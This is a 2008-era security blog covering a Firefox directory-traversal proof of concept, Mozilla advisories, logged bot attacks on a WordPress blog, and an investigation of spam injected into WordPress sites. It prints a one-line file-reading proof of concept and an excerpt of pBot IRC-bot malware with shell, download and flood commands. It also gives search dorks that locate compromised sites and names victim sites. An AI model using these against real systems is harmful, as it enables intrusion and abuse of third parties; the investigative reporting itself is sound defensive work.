We are going to see Firefox 2.0.0.13 probably by end of this week. Check out this directory transversal code using view-sources: & resource: scheme
view-source:resource:///
translate to file:///C:/Program%20Files/Mozilla%20Firefox/

You can read/include firefox pref settings with this code. <script src=”view-source:resource:///greprefs/all.js”></script>

Workaround

Install No-script Add-ons.

Credits

Ronald van den Heetkamp at 0×000000

External Links

• Firefox 2.0.0.12 Information Leak POC

Firefox 2.0.0.12 Security Update fixes 7 Vulnerability & 3 critical patch (memory corruption, JavaScript Engine Crashes).

Known Vulnerabilities in Mozilla Products (Firefox 2.0.0.11)

MFSA 2008-11

Web forgery overwrite with div overlay

Descriptions

Security researchers Emil Ljungdahl and Lars-Olof Moilanen demonstrated that, in cases where the entire contents of a page are enclosed in a <div> with absolute positioning, a web forgery warning dialog won’t be displayed unless the user switches tabs away-from then back-to the forgery page.

References

• Web forgery warning not shown until tab switch
• National Vulnerability Database (NVD) - CVE-2008-0594

MFSA 2008-10

URL token stealing via stylesheet redirect

Descriptions

Security researcher Martin Straka reported that Gecko-based browsers update the .href property of stylesheet DOM nodes to reflect the final URI of the stylesheet after following any 302 redirects (much as the document.location property is updated). This differs from other browsers and could potentially reveal sensitive URL parameters, such as those used by Single-signon sytems, to scripts on the page.

References

• Stylesheet href property shows redirected URL unlike other browsers
• National Vulnerability Database (NVD) - CVE-2008-0593

MFSA 2008-09

Mishandling of locally-saved plain text files

Descriptions

Mozilla contributor oo.rio.oo demonstrated that once a file with Content-Disposition: attachment and (improper) Content-Type: plain/text is saved locally, the browser would no longer open local files with .txt extensions for viewing, but would rather prompt the user to save the file.

References

• plain text txt file viewing capability lost after having downloaded a txt file with content-disposition: attachment and content-type: plain/text
• National Vulnerability Database (NVD) - CVE-2008-0592

MFSA 2008-08

File action dialog tampering

Descriptions

Security researcher Michal Zalewski demonstrated that timer-enabled security dialogs can be subverted by attackers using JavaScript to change the window focus. Zalewski showed that a user could be tricked into confirming a security dialog of this type by bringing the dialog back into focus right before a user clicked in a predictable time and place.

References

• file action dialog controls vulnerable to refocus race
• National Vulnerability Database (NVD) - CVE-2008-0591

MFSA 2008-06

Web browsing history and forward navigation stealing

Descriptions

Mozilla contributor David Bloom reported a vulnerability in the way images are treated by the browser when a user leaves a page which utilizes designMode frames. The reported issue can be used to steal a user’s navigation history, forward navigation information, and crash the user’s browser. The crash showed evidence of memory corruption and might be exploitable to run arbitrary code.

References

• Vulnerability allows script to see where user is headed, sniff history, and crash [@ nsDocShell::Destroy()] the browser too
• National Vulnerability Database (NVD) - CVE-2008-0419

MFSA 2008-05

Directory traversal via chrome: URI

Descriptions

Gerry Eisenhaur reported the chrome: URI scheme improperly allowed directory traversal that could be used to load JavaScript, images, and stylesheets from local files in known locations. This traversal was possible only when the browser had installed add-ons which used “flat” packaging rather than the more popular .jar packaging, and the attacker would need to target that specific add-on.

Mozilla researcher moz_bug_r_a4 reported that this vulnerability could be used to steal the contents of the browser’s sessionstore.js file, which contains session cookie data and information about currently open web pages.

References

• Allows to steal data from sessionstore.js
• chrome directory traversal (local disk access via “flat” addons)
• list of “flat” packaged add-ons
• National Vulnerability Database (NVD) - CVE-2008-0418

MFSA 2008-04

Stored password corruption

Descriptions

Mozilla developer Justin Dolske discovered that malicious sites, upon a user saving his or her password, could inject newlines into Firefox’s password store and corrupt saved passwords for other sites.

References

• Content can corrupt stored passwords by injecting line breaks
• National Vulnerability Database (NVD) - CVE-2008-0417

MFSA 2008-03

Privilege escalation, XSS, Remote Code Execution

Descriptions

Mozilla contributors moz_bug_r_a4 and Boris Zbarsky submitted a series of vulnerabilities which allow scripts from page content to escape from its sandboxed context and/or run with chrome privileges. An additional vulnerability reported by moz_bug_r_a4 demonstrated that the XMLDocument.load() function can be used to inject script into another site, violating the browser’s same-origin policy.

References

• List of JavaScript privilege escalation bugs
• National Vulnerability Database (NVD) - CVE-2008-0415

MFSA 2008-02

Multiple file input focus stealing vulnerabilities

Descriptions

Security researchers hong and Gregory Fleisher each reported a variant on earlier reported bugs regarding focus shifting in file input controls. Their variants used file input controls nested inside <label> tags to take advantage of automatic focus shifting into the file input field noted on the Hacker WebZine. As with the earlier reported issues this issue could be used to force a user to upload arbitrary files assuming the attacker knows the full path and name of the file.

These bugs are variations on earlier problems reported by Charles McAuley and Michal Zalewski which were fixed in Firefox 2.0.0.4, as well as an issue reported by hong which was fixed in Firefox 2.0.0.8.
Gregory Fleisher also submitted a series of demonstrations of different ways to lure a user to place focus into the file input control manually. These demonstrations included “focus spoofing” by selectively capturing keystrokes and placing the captured characters where the user thinks the focus should be.

References

• List of Focus shifting bugs
• National Vulnerability Database (NVD) - CVE-2008-0414

MFSA 2008-01

Crashes with evidence of memory corruption (rv:1.8.1.12)

Descriptions

Mozilla developers identified and fixed several stability bugs in the browser engine used in Firefox 2.0.0.12 and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code.

Thunderbird shares the browser engine with Firefox and could be vulnerable if JavaScript were to be enabled in mail. This is not the default setting and we strongly discourage users from running JavaScript in mail. Without further investigation we cannot rule out the possibility that for some of these an attacker might be able to prepare memory for exploitation through some means other than JavaScript such as large images.

References

• List of JavaScript Engine Crashes
• National Vulnerability Database (NVD) - CVE-2008-0413
• List of Browser Crashes Bugs
• National Vulnerability Database (NVD) - CVE-2008-0412

Thunderbird Security Release

Thunderbird 2.0.0.12 is schedule to be release on February 28.

External Links

• Download Firefox 2.0.0.12

Today’s we just upgrade from WordPress 2.3.2 to 2.3.3 security release. There is 21 attack (script injections) on blog.kakkoi.net from 3 known bot-herder scripts ↓. The first attacker is from 212.24.62.200 → udkado.ru masking their useragent as Googlebot (a real human?). The were playing with my 302.curie redirect page at blog.kakkoi.net/uri/. I send the attacker data to abuse network and IronPort.

The next few hours we received 20 attack from the same bot-herder. They probably has a large scale of DDNS (china → korea → us ). Noticeably the scans pattern is predictable. From our Feb 5th attack all these botnet is targeting certain search keywords security, injection so we setup a honey-pot right on that particular URL.

Hacking Attempts on Kakkoi

Sort by Injection type.

The Bot-herder Host

Part of class pBot source taken from http://basiclifesaving.org/mycomments/rom.txt

<? 

/*
 *
 * #crew@corp. since 2003
 * edited by: devil__ <admin@xdevil.org>
 *
 * COMMANDS:
 *
 * .user <password> //login to the bot
 * .logout //logout of the bot
 * .die //kill the bot
 * .restart //restart the bot
 * .mail <to> <from> <subject> <msg> //send an email
 * .dns <IP|HOST> //dns lookup
 * .download <URL> <filename> //download a file
 * .exec <cmd> // uses exec() //execute a command
 * .sexec <cmd> // uses shell_exec() //execute a command
 * .cmd <cmd> // uses popen() //execute a command
 * .info //get system information
 * .php <php code> // uses eval() //execute php code
 * .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
 * .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
 * .raw <cmd> //raw IRC command
 * .rndnick //change nickname
 * .pscan <host> <port> //port scan
 * .safe // test safe_mode (dvl)
 * .inbox <to> // test inbox (dvl)
 * .conback <ip> <port> // conect back (dvl)
 * .uname // return shell's uname using a php function (dvl)
 *
 */

set_time_limit(0);
error_reporting(0);
echo "Ok unlocker. We did i!";

class pBot
{
 var $config = array("server"=>"Bucharest.ro.eu.ultra-chat.org",
 "port"=>"6667",
 "pass"=>"n",
 "prefix"=>"[R]",
 "maxrand"=>"4",
 "chan"=>"#unlocker",
 "chan2"=>"#unlocker",
 "key"=>"n",
 "modes"=>"+p",
 "password"=>"n",
 "trigger"=>".",
 "hostauth"=>"Robert.users.ultra-chat.org" // * for any hostname (remember: /setvhost xdevil.org)
 );

Related Posts

• Daily Hacking Attempts on blog.kakkoi.net - Feb 5th, 2008
• Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan

External Links

• Wikipedia → Botnet
• Storm Botnet
• Dynamic DNS

I received lots of multiple botnet injection (e.g: code & sql) on my wordpress blog. All the failed attempts from these Botnet (Bot-herder) will be published in this post. Somebody might find the informations useful ↓.

Failed Hacking Attempts

Sort by Injection type.

Related Posts

• Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan

External Links

• Wikipedia → Botnet
• Storm Botnet

Apple QuickTime contains a stack buffer overflow vulnerability in the way it handles the RTSP Content-Type header. This vulnerability may be exploited by specially crafted RTSP stream protocol

Live Example

• GNUcitizen- Backdooring QuickTime Movies
• Apple QuickTime redirection to the RTSP exploit

Elia Florio (Symantec) wrap a good introduction post regarding QuickTime 0 day Exploit.

Known Vulnerabilities Proof of concept (milw0rm).

• Apple QuickTime 7.3 RTSP Response Content-Type Header Stack Buffer Overflow exploit
• Apple QuickTime Remote stack rewrite exploit for Internet Explorer 6 & 7
• Apple QuickTime 7.2/7.3 RTSP Response Universal Exploit (IE7/FF/Opera)
• Apple Quicktime (Vista/XP Sp2 RTSP RESPONSE) Code Exec Exploit

Workarounds

You may try the following workarounds, as there is no complete patch for this this vulnerability.

• Block TCP port 554 (optionaly 7070) and UDP 6970 through 6999 in your firewall
• Update Quicktime
• Disabled Apple Quicktime ActiveX control running in Internet Explorer (Windows registry file)
• For Firefox - Noscripts addons

Related Links

• RTSP - rfc2326 & RTP - rfc1889
• Apple Security Update on Safari 3 Beta Update 3.0.4
• NVD Database - Buffer overflow in Apple QuickTime
• Microsoft KB240797 - How to stop an ActiveX control from running in Internet Explorer

Dec 11 2007 - Matt Heaton Blog’s has been cleansed. ATM he’s using latest version of WordPress (2.3.x). And also most of the blogs lists in this articles has been upgrade.

Jan 26th, 2008 - Seem like bluehost engineer did a bad job at cleaning, the goro spam is back.

Just after the recent issue on wordpress.com.cn now there is new wordpress imitater. A remote spamware injection by wordpress.net.in

I was reading one of Matt Heaton posted 2 days ago when I found bunch of spamsware link on his wordpress footer.

Matt’s is using default wodpress theme (kubrick) with single javascript for adsense. The only way the spams can get in is probably via php injection or by manual editing. All the spamware is redirect to howardowens.com/?order=XX page.

Lookup for howardowens.com

The below diagram explained the lookup results for howardowens.com. click on the image to enlarge.

Surprisingly the spammer website is also host by bluehost.com (69.89.16.0/20,74.220.192.0/19 ,69.89.16.4 -> box183.bluehost.com).

Tracking the spam sources.

Raw whois for wordpress.net.in

Domain ID:D2500581-AFIN
Domain Name:WORDPRESS.NET.IN
Created On:22-Apr-2007 12:01:55 UTC
Last Updated On:22-Jun-2007 02:26:40 UTC
Expiration Date:22-Apr-2008 12:01:55 UTC
Sponsoring Registrar:Direct Information Pvt. Ltd. dba PublicDomainRegistry.com (R5-AFIN)
Status:OK
Registrant ID:DI_4275224
Registrant Name:Mick Jagger
Registrant Organization:N/A
Registrant Street1:1 Red Square
Registrant City:Moscow
Registrant State/Province:Massachusetts
Registrant Postal Code:123592
Registrant Country:RU
Registrant Phone:+007.7581235641
Registrant Email:mkk.goro@bk.ru
Admin ID:DI_4275224
Admin Name:Mick Jagger
Admin Organization:N/A
Admin Street1:1 Red Square
Admin City:Moscow
Admin State/Province:Massachusetts
Admin Postal Code:123592
Admin Country:RU
Admin Phone:+007.7581235641
Admin Email:mkk.goro@bk.ru
Tech ID:DI_4275224
Tech Name:Mick Jagger
Tech Organization:N/A
Tech Street1:1 Red Square
Tech City:Moscow
Tech State/Province:Massachusetts
Tech Postal Code:123592
Tech Country:RU
Tech Phone:+007.7581235641
Tech Email:mkk.goro@bk.ru
Name Server:MKKG98981.MERCURY.ORDERBOX-DNS.COM
Name Server:MKKG98981.VENUS.ORDERBOX-DNS.COM
Name Server:MKKG98981.EARTH.ORDERBOX-DNS.COM
Name Server:MKKG98981.MARS.ORDERBOX-DNS.COM

Note: The registrant address on 1 red square is a famous restaurant in Moscow.

Its pretty obvious that wordpress.net.in belong to registrar in India.

Live example wordpress.net.in injection

Google query for warning “[function.include]” allintext: “wordpress.net.in” . Used fiddler or any http-inspector to trace the full header request.

1 Evan Morris

Wordpress 2.0.6 | url | screenshot

2 carwax

Wordpress 1.5.2 | url | screenshot

3 aabenthus.biz

Wordpress 2.0.x | url | screenshot

4 mythinger.com

Wordpress 2.0.2 | url | screenshot

5 classicalanglican.net

Wordpress 2.0.2 | url | screenshot

6 echo9er.net

WordPress 1.5.1 | url | screenshot

7 boyarick.com

Wordpress 2.0.2 | url | screenshot

Google Directory search for class-mail.php

Search for class-mail.php in open directory (public).
“parent directory” class-mail.php -html -htm –php -shtml -md5 -md5sums

• jean-cyril.com - wp-includes · spams link redirect to www.901am.com/?page=2157. jean-cyril.com has wp-info.txt inside his wp-includes directory. This text files hold unserialize database password and stuff.
• floaridablog.org - wp-includes · spams redirect to communications.uml.edu/sunrise/?id=1076 (University of Massachusetts Lowell) the offending spams page has been removed by UML maintainer.

Hiding from search engine Spiders

First, I did some more comparative search at archive.org for howardowens.com and mattheaton.com. It turn out both of this sites has been stop from IA Archiver few months before the spams start showing on their footer. You will need to check howardowens index on archive.org so you can understand my suspicious.

• http://web.archive.org/web/*/http://www.howardowens.com
• http://web.archive.org/web/*/http://www.mattheaton.com

Out of boredom I cloaked myself as the following agents.

• Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) - 74.6.8.125 - llf520032.crawl.yahoo.net
• Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 66.249.64.50 - crawl-66-249-64-50.googlebot.com
• Mozilla/2.0 (compatible; Ask Jeeves/Teoma) - 65.214.44.204 - egspd42002.ask.com
• Mediapartners-Google/2.1 66.249.73.213 - crawl-66-249-73-213.googlebot.com

Not much change on both of these sites. Then I read the status header, it return 404 instead of 200. Nice tricks for stopping crawler & spider from spying their joy-ride-spamhouse.

Summary

bits & bytes from this accident we knew that

• Most of the site inject are running on wordpress 2.0.6 & below
• allow_furl_open is set to true for this injection to work
• Most of the blogs owner is unaware about the spams links (cloacking)

Checkout Murray access log, it will give you some ideas with the remote injections methods.

Update

Dec 03 2007

All the spams link to howardowens.com page has been removed. I havent talk with howardowens but I assume howard’s site is being injected the same way like Matt Heaton blog.

Dec 04 2007

Mattheaton.com has a minor update, the spams now inject on both header and footer.
tangonoticias.com:7070/d_pill/577.html.
As tangonoticias.com is running on Joomla CMS they create a static “Wordpress” on port 7070 (Real Network Server & RSTP Port). This is probably a work of different attacker, taking advantage of Matt heaton blindspot. Google Cache (Nov 12)

Dec 11 2007

Matt heaton has been purified. He’s now using latest version of Wordpress (2.3.1). You can still view it on cached thought & screenshot.

Related Post

• How to Removed wordpress.net.in Spam Injection
• Jan 31st, 2008 - Matt Heaton Bluehost Hostmonster CEO Hacked Again - Strike II

External Links

• Bluehost Hostmonster CEO’s blog
• DNS Lookup results for wordpress.net.in
• Aboutus.org wiki on MattHeaton.com
• National Vulnerabilities Database (NVD) on Wordpress 2.0 > 2.0.5 vulnerabilities
• Murray’s Blog My Wordpress Cracked
• pseudo-flaw - more random wordpress blogs owned by seo spammers